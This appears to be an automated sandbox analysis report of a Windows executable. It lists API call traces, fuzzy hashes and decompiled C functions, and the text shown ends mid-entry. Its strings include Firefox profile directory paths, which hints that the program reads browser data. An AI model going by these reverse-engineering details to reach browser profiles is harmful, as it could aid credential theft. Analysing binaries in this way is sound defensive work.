                                                                                                                        • API ID: CriticalSection$EnterH_prolog3Leave$DeleteH_prolog3_catchInitialize__vsnprintf_c_l__vswprintf_helper_wmemset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4194284523-0
                                                                                                                        • Opcode ID: 5900aa0bf7395fb5038aed8c814d7b50bd5234d5f3988f045980ee0d0d58b7cc
                                                                                                                        • Instruction ID: aff3d7849d96d95b584263cba1bf6186ab4ca9716271c606ad5e587042c4aac5
                                                                                                                        • Opcode Fuzzy Hash: 5900aa0bf7395fb5038aed8c814d7b50bd5234d5f3988f045980ee0d0d58b7cc
                                                                                                                        • Instruction Fuzzy Hash: 43219F71900289AFDB11DFA4CC81AEEB7B8FB58304F10852EF555E7290EB786A448B64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2719
                                                                                                                        • EnterCriticalSection.KERNEL32(?,0000004C,004BF2D2, NI,00000001,00833EB8,0000002C,004BDD2C), ref: 004A2727
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A27EF
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                        • LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 004A27DE
                                                                                                                          • Part of subcall function 004A1E9D: __EH_prolog3.LIBCMT ref: 004A1EA4
                                                                                                                          • Part of subcall function 004A1E9D: EnterCriticalSection.KERNEL32(?,00000004,004A278C,00000000,00000000,?,00000000,?), ref: 004A1EB2
                                                                                                                          • Part of subcall function 004A1E9D: CharUpperW.USER32(00000000), ref: 004A1EC9
                                                                                                                          • Part of subcall function 004A1E9D: LeaveCriticalSection.KERNEL32(?), ref: 004A1EDC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$H_prolog3Leave$Enter$CharInitializeUpper
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2091688341-0
                                                                                                                        • Opcode ID: 6bfce428f6342b53122b42cbcf1b73ed16168ebc7a41f4f1eeed34a61fe4e977
                                                                                                                        • Instruction ID: 1e69aa617de223fc617bd2d8ab6b25677be807872c46e10db52ea2b2cc141346
                                                                                                                        • Opcode Fuzzy Hash: 6bfce428f6342b53122b42cbcf1b73ed16168ebc7a41f4f1eeed34a61fe4e977
                                                                                                                        • Instruction Fuzzy Hash: E821D335801205AADB11EBB8CD45BEDFBB4BF22314F14421EE422A72E1DB786F44D758
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A230() {
                                                                                                                        				int _v4;
                                                                                                                        				char _v7;
                                                                                                                        				char _v8;
                                                                                                                        				intOrPtr* _t15;
                                                                                                                        				char _t18;
                                                                                                                        				int _t23;
                                                                                                                        				signed int _t29;
                                                                                                                        				void* _t32;
                                                                                                                        
                                                                                                                        				if(GetCommandLineA() == 0) {
                                                                                                                        					L20:
                                                                                                                        					ExitProcess(0);
                                                                                                                        				}
                                                                                                                        				_v4 = 0;
                                                                                                                        				_t32 = E6F33A3D0(_t12,  &_v4);
                                                                                                                        				if(_t32 == 0) {
                                                                                                                        					L19:
                                                                                                                        					goto L20;
                                                                                                                        				}
                                                                                                                        				_t23 = _v4;
                                                                                                                        				if(_t23 <= 2) {
                                                                                                                        					L18:
                                                                                                                        					LocalFree(_t32);
                                                                                                                        					goto L19;
                                                                                                                        				}
                                                                                                                        				_t29 = 2;
                                                                                                                        				if(_t23 <= 2) {
                                                                                                                        					L17:
                                                                                                                        					goto L18;
                                                                                                                        				}
                                                                                                                        				do {
                                                                                                                        					_t15 =  *((intOrPtr*)(_t32 + _t29 * 4));
                                                                                                                        					if( *((char*)(_t15 + 1)) != 0) {
                                                                                                                        						goto L10;
                                                                                                                        					}
                                                                                                                        					_v8 =  *_t15;
                                                                                                                        					_v7 = 0;
                                                                                                                        					CharLowerA( &_v8);
                                                                                                                        					_t18 = _v8;
                                                                                                                        					if(_t18 == 0x66) {
                                                                                                                        						E6F33A130(1);
                                                                                                                        						L15:
                                                                                                                        						L16:
                                                                                                                        						goto L17;
                                                                                                                        					}
                                                                                                                        					if(_t18 == 0x65) {
                                                                                                                        						E6F33A130(0);
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					if(_t18 == 0x75) {
                                                                                                                        						E6F339BD0(1);
                                                                                                                        						goto L15;
                                                                                                                        					}
                                                                                                                        					_t23 = _v4;
                                                                                                                        					L10:
                                                                                                                        					_t29 = _t29 + 1;
                                                                                                                        				} while (_t29 < _t23);
                                                                                                                        				goto L16;
                                                                                                                        			}












                                                                                                                        APIs
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F33A233
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33A2DF
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • CharLowerA.USER32(?,?,?,?,?,?), ref: 6F33A29A
                                                                                                                        • LocalFree.KERNEL32(00000000,?), ref: 6F33A2D6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Local$AllocCharCommandExitFreeLineLowerProcesslstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4176052798-0
                                                                                                                        • Opcode ID: 45b02f9bcce8a1a4ee07437cb1ba249ed157c0e17c44d5675a529c353e9943aa
                                                                                                                        • Instruction ID: 62b543cad9f8bf822fa7c11b2b4b434f62112e2da109fba511b37d372d18994b
                                                                                                                        • Opcode Fuzzy Hash: 45b02f9bcce8a1a4ee07437cb1ba249ed157c0e17c44d5675a529c353e9943aa
                                                                                                                        • Instruction Fuzzy Hash: 6B11273BC4C3E89FDF00DAA88804B9A7BDE5F52315F00041AE09AC21C2C7A3A445A7A3
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A2ABC
                                                                                                                        • EnterCriticalSection.KERNEL32(?,00000004,004DCD5C,00784028,00000001,00000000,?,00000001,00000001,?,?), ref: 004A2ACA
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A2AE5
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 004A2B34
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$Leave$EnterH_prolog3
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2873666866-0
                                                                                                                        • Opcode ID: 4e9e88b97d49e07eb329c0f5b348c98fc11682ffaeb046cc33372730c3482b49
                                                                                                                        • Instruction ID: 7b243691d3346a8cff939f8a190051535b0a0705e5ac48a72c44950eb4b4ad62
                                                                                                                        • Opcode Fuzzy Hash: 4e9e88b97d49e07eb329c0f5b348c98fc11682ffaeb046cc33372730c3482b49
                                                                                                                        • Instruction Fuzzy Hash: 2F01D630A0030287DF365F2C8A4537FB7A5BBA3311F10550AD462962A1CBBC6942F728
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F33A2F0(short* _a4, signed int _a8, intOrPtr* _a12) {
                                                                                                                        				intOrPtr* _t11;
                                                                                                                        				char* _t12;
                                                                                                                        				int _t13;
                                                                                                                        				int _t17;
                                                                                                                        				short* _t18;
                                                                                                                        
                                                                                                                        				_t18 = _a4;
                                                                                                                        				_t12 = 0;
                                                                                                                        				asm("sbb esi, esi");
                                                                                                                        				_t17 =  ~_a8 & 0x0000fde9;
                                                                                                                        				_t13 = WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, 0, 0, 0, 0);
                                                                                                                        				if(_t13 > 0) {
                                                                                                                        					_t3 = _t13 + 1; // 0x1
                                                                                                                        					_t12 = HeapAlloc(GetProcessHeap(), 8, _t3);
                                                                                                                        					WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, _t12, _t13, 0, 0);
                                                                                                                        					_t11 = _a12;
                                                                                                                        					if(_t11 != 0) {
                                                                                                                        						 *_t11 = _t13 - 1;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				return _t12;
                                                                                                                        			}









                                                                                                                        APIs
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A311
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000001,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0), ref: 6F33A323
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C,00000000,00000034,?,?,?,6F3403A0,0000009C), ref: 6F33A32A
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000009C,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,00000000,6F336F16,00A56660,00000001,0000009C), ref: 6F33A33E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharHeapMultiWide$AllocProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1432973188-0
                                                                                                                        • Opcode ID: 513b045bd5d977dfe80e25a0a9e41211161571cc39ed78a84d69232520f86582
                                                                                                                        • Instruction ID: c69044fcc06c6c2d78e20d22f4d4effe7338ccd1a74ded6e4d271befcf7ba498
                                                                                                                        • Opcode Fuzzy Hash: 513b045bd5d977dfe80e25a0a9e41211161571cc39ed78a84d69232520f86582
                                                                                                                        • Instruction Fuzzy Hash: B5F04F7760462E7FEA108A6A8C84F67B7ADEB86BB5F100229FA24D31C0D660EC154671
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,005406A9,00539730,00000001,00542E13,?,00000000,00000000,?,?,005343D6,00542F25,?,005343D6,?), ref: 005430B6
                                                                                                                          • Part of subcall function 00542F6D: TlsGetValue.KERNEL32(00000000,005430C9,?,?,005343D6,00542F25,?,005343D6,?), ref: 00542F74
                                                                                                                          • Part of subcall function 00542F6D: TlsSetValue.KERNEL32(00000000,?,005343D6,00542F25,?,005343D6,?), ref: 00542F95
                                                                                                                        • __calloc_crt.LIBCMT ref: 005430D8
                                                                                                                          • Part of subcall function 00540F7C: __calloc_impl.LIBCMT ref: 00540F8A
                                                                                                                          • Part of subcall function 00540F7C: Sleep.KERNEL32(00000000,?,005343D6,?), ref: 00540FA1
                                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000002,00542086,00537225,005343D6,?,005343D6,?), ref: 00542EE8
                                                                                                                          • Part of subcall function 00542EDB: TlsGetValue.KERNEL32(00000005,?,005343D6,?), ref: 00542EFF
                                                                                                                          • Part of subcall function 00542FF5: GetModuleHandleA.KERNEL32(KERNEL32.DLL,007D5B80,0000000C,00543106,00000000,00000000,?,?,005343D6,00542F25,?,005343D6,?), ref: 00543006
                                                                                                                          • Part of subcall function 00542FF5: GetProcAddress.KERNEL32(?,EncodePointer), ref: 0054303A
                                                                                                                          • Part of subcall function 00542FF5: GetProcAddress.KERNEL32(?,DecodePointer), ref: 0054304A
                                                                                                                          • Part of subcall function 00542FF5: InterlockedIncrement.KERNEL32(00810930), ref: 0054306C
                                                                                                                          • Part of subcall function 00542FF5: __lock.LIBCMT ref: 00543074
                                                                                                                          • Part of subcall function 00542FF5: ___addlocaleref.LIBCMT ref: 00543093
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00543108
                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,005343D6,00542F25,?,005343D6,?), ref: 00543120
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1081334783-0
                                                                                                                        • Opcode ID: 53b845ae17de35decfdb8c4374abd41db695b43b3d35d843e2d459e64a5967bf
                                                                                                                        • Instruction ID: 8c9bd9032edc723ec5a1734115c697f610c33a85ea35646c2feb52735e1e513e
                                                                                                                        • Opcode Fuzzy Hash: 53b845ae17de35decfdb8c4374abd41db695b43b3d35d843e2d459e64a5967bf
                                                                                                                        • Instruction Fuzzy Hash: 72F028325042236BD7323778AC0F6DA3E64FF897B1F204219F514961E1DF25C942CAD4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004A195E
                                                                                                                        • InitializeCriticalSection.KERNEL32(?,00000004,004A3321,00000000,00000000,?,?,?,?,?,00000008,004BB0FD,?,00000000), ref: 004A1973
                                                                                                                        • _strlen.LIBCMT ref: 004A198C
                                                                                                                        • _mbstowcs.LIBCMT ref: 004A19A7
                                                                                                                          • Part of subcall function 0053A4FD: __mbstowcs_l_helper.LIBCMT ref: 0053A51B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalH_prolog3InitializeSection__mbstowcs_l_helper_mbstowcs_strlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4276943295-0
                                                                                                                        • Opcode ID: e1ec9e72b8bbf77ae98ff7c270c0279c6940fb37f2a6573085775b3e33ba502f
                                                                                                                        • Instruction ID: 3ac07268216910a4535ea5e05e968f667f3b62dd9118136c005e3060a1736e2e
                                                                                                                        • Opcode Fuzzy Hash: e1ec9e72b8bbf77ae98ff7c270c0279c6940fb37f2a6573085775b3e33ba502f
                                                                                                                        • Instruction Fuzzy Hash: 7FF0F671801607AFDB11EF20C8097AEBF71BF41322F008216F5548B391CB748A14DBD5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0059F243
                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF,000000FF,?,?,0059F6FB), ref: 0059F24E
                                                                                                                        • GetExitCodeThread.KERNEL32(000000FF,?,00000000,?,?,0059F6FB), ref: 0059F25E
                                                                                                                        • CloseHandle.KERNEL32(000000FF,?,?,0059F6FB), ref: 0059F26A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$CloseCodeExitHandleMessageObjectPostSingleWait
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2249347992-0
                                                                                                                        • Opcode ID: bcbefdc3c0108b0a80f65901d016e7a7df404a622904fa56ba2ee180f0e4ac29
                                                                                                                        • Instruction ID: 470dcaf36edad1e74e6c5957a2666f90a18739aaa67dbec05905e8c206957b1c
                                                                                                                        • Opcode Fuzzy Hash: bcbefdc3c0108b0a80f65901d016e7a7df404a622904fa56ba2ee180f0e4ac29
                                                                                                                        • Instruction Fuzzy Hash: 81F03A36000B44FFEB314B69DC0995ABFB5FB89722B144728F1E6914F0D730AA52DB14
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004B5A58
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004B5A8E
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: map/set<T> too long
                                                                                                                        • API String ID: 1961742612-1285458680
                                                                                                                        • Opcode ID: 7f0f6be1992fc2415de07e84cb9a67faecded051de283232d2e5f74209d034bb
                                                                                                                        • Instruction ID: 2c3c54ada47b0557a3203b3a0dce35e00f3b020d822c1e53a3ccc12e6038366d
                                                                                                                        • Opcode Fuzzy Hash: 7f0f6be1992fc2415de07e84cb9a67faecded051de283232d2e5f74209d034bb
                                                                                                                        • Instruction Fuzzy Hash: 67416970600641AFCB11DF58C5C4BAAFBE1BF09304F59829AE8596B792C778FC41CBA4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C0AC6
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004C0AFC
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: map/set<T> too long
                                                                                                                        • API String ID: 1961742612-1285458680
                                                                                                                        • Opcode ID: ea35f79c126089068ddd81563cfa06c97152ab47e051ba524bfff92fb07b3709
                                                                                                                        • Instruction ID: 01858b13b2e580b50971de02b404033cfd795de5fb4d2ace235499cff564d67e
                                                                                                                        • Opcode Fuzzy Hash: ea35f79c126089068ddd81563cfa06c97152ab47e051ba524bfff92fb07b3709
                                                                                                                        • Instruction Fuzzy Hash: EB416478600140DFCB51DF99C684FA9BBE1AF09308F49908EE5599B3A2D778FC81CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BCBDD
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 004BCC13
                                                                                                                          • Part of subcall function 0053BDBF: RaiseException.KERNEL32(?,00534422,"DS,?,?,?,?,?,00534422,?,007D62FC,00899B00), ref: 0053BDFF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionException@8H_prolog3RaiseThrow
                                                                                                                        • String ID: map/set<T> too long
                                                                                                                        • API String ID: 1961742612-1285458680
                                                                                                                        • Opcode ID: d8dd8d571e7b53f6ff0dad84b1d011d535eb389e8d9576c839ab9a2559a31881
                                                                                                                        • Instruction ID: d98343a05744513c7fc1dfe10d33a5f6dd3184023bbfae2b6eb9a14603713a8c
                                                                                                                        • Opcode Fuzzy Hash: d8dd8d571e7b53f6ff0dad84b1d011d535eb389e8d9576c839ab9a2559a31881
                                                                                                                        • Instruction Fuzzy Hash: AF4148706002419FC725DF58C1C8AA6BFF1BF19304F19819AE5499B352C779FC41CBA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BF1C9
                                                                                                                          • Part of subcall function 004A2712: __EH_prolog3.LIBCMT ref: 004A2719
                                                                                                                          • Part of subcall function 004A2712: EnterCriticalSection.KERNEL32(?,0000004C,004BF2D2, NI,00000001,00833EB8,0000002C,004BDD2C), ref: 004A2727
                                                                                                                          • Part of subcall function 004A2712: LeaveCriticalSection.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 004A27DE
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A2DA5: __EH_prolog3.LIBCMT ref: 004A2DAC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$EnterInitializeLeave
                                                                                                                        • String ID: NI$ QS
                                                                                                                        • API String ID: 3061355161-1958716692
                                                                                                                        • Opcode ID: 0cdb80b1bc79fbf0d48a8cf9024e578286f06820a8ab9b33db6636cf4bd1a510
                                                                                                                        • Instruction ID: 851df7f533dbb76401c13edf793070be194cb0c7cad1b6d438316afebe21b6e0
                                                                                                                        • Opcode Fuzzy Hash: 0cdb80b1bc79fbf0d48a8cf9024e578286f06820a8ab9b33db6636cf4bd1a510
                                                                                                                        • Instruction Fuzzy Hash: A23114B5E01609BADB08DFA0CD529EFBB38FF51344F00406EB50666241D7795F05DBA9
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00502525
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004E91D9: __EH_prolog3.LIBCMT ref: 004E91E0
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,WaitingThread.new ConnectionThread.Failed , LE=,00000000), ref: 005025DB
                                                                                                                          • Part of subcall function 004C47CD: __EH_prolog3.LIBCMT ref: 004C47D4
                                                                                                                          • Part of subcall function 004E9FA6: __EH_prolog3.LIBCMT ref: 004E9FAD
                                                                                                                          • Part of subcall function 004E9FA6: CreateThread.KERNEL32 ref: 004E9FDD
                                                                                                                        Strings
                                                                                                                        • WaitingThread.new ConnectionThread.Failed , LE=, xrefs: 005025C8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CreateCriticalErrorInitializeLastSectionThread
                                                                                                                        • String ID: WaitingThread.new ConnectionThread.Failed , LE=
                                                                                                                        • API String ID: 628715854-23746943
                                                                                                                        • Opcode ID: 9ed26476f62b07c2b07d2491cfbfe6beca7cd47acc766257e1607c8c2e544eb2
                                                                                                                        • Instruction ID: 81e4dc0dad3a249792ff11a13af2a53550af703f3c5101841e93d9e9b8aec9e5
                                                                                                                        • Opcode Fuzzy Hash: 9ed26476f62b07c2b07d2491cfbfe6beca7cd47acc766257e1607c8c2e544eb2
                                                                                                                        • Instruction Fuzzy Hash: 4431F4B0D00248EEEB05EBA5C85BAEEBF78AF55308F10425EF111671D2DB781E44C766
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 00503547
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 00503288: __EH_prolog3.LIBCMT ref: 0050328F
                                                                                                                          • Part of subcall function 00503288: _malloc.LIBCMT ref: 0050329B
                                                                                                                        Strings
                                                                                                                        • \Mozilla\Firefox\Profiles\, xrefs: 005035C8
                                                                                                                        • \Mozilla\Profiles\default\, xrefs: 005035FD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$DeleteEnterLeave_malloc
                                                                                                                        • String ID: \Mozilla\Firefox\Profiles\$\Mozilla\Profiles\default\
                                                                                                                        • API String ID: 4289920900-1112706577
                                                                                                                        • Opcode ID: ac2d6f77105ca4905a64da071747f833eaf62ee7cd31e3ab46fd7af5e7d3ba8e
                                                                                                                        • Instruction ID: 34b72d607ab1a7d6e289004e4756f08ea93e8813113aac19830773f17794f34d
                                                                                                                        • Opcode Fuzzy Hash: ac2d6f77105ca4905a64da071747f833eaf62ee7cd31e3ab46fd7af5e7d3ba8e
                                                                                                                        • Instruction Fuzzy Hash: 2331D134401784EAD711EB75C956BCEFBF5AF22304F50865DA097631E2CBB82B08CB55
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0050264B
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004E91D9: __EH_prolog3.LIBCMT ref: 004E91E0
                                                                                                                          • Part of subcall function 004C47CD: __EH_prolog3.LIBCMT ref: 004C47D4
                                                                                                                          • Part of subcall function 004E9FA6: __EH_prolog3.LIBCMT ref: 004E9FAD
                                                                                                                          • Part of subcall function 004E9FA6: CreateThread.KERNEL32 ref: 004E9FDD
                                                                                                                        Strings
                                                                                                                        • eingehende IPC-Verbindung, xrefs: 0050265B
                                                                                                                        • WatitingThread.new ConnectionThread.Failed, xrefs: 005026F1
                                                                                                                        Memory Dump Source
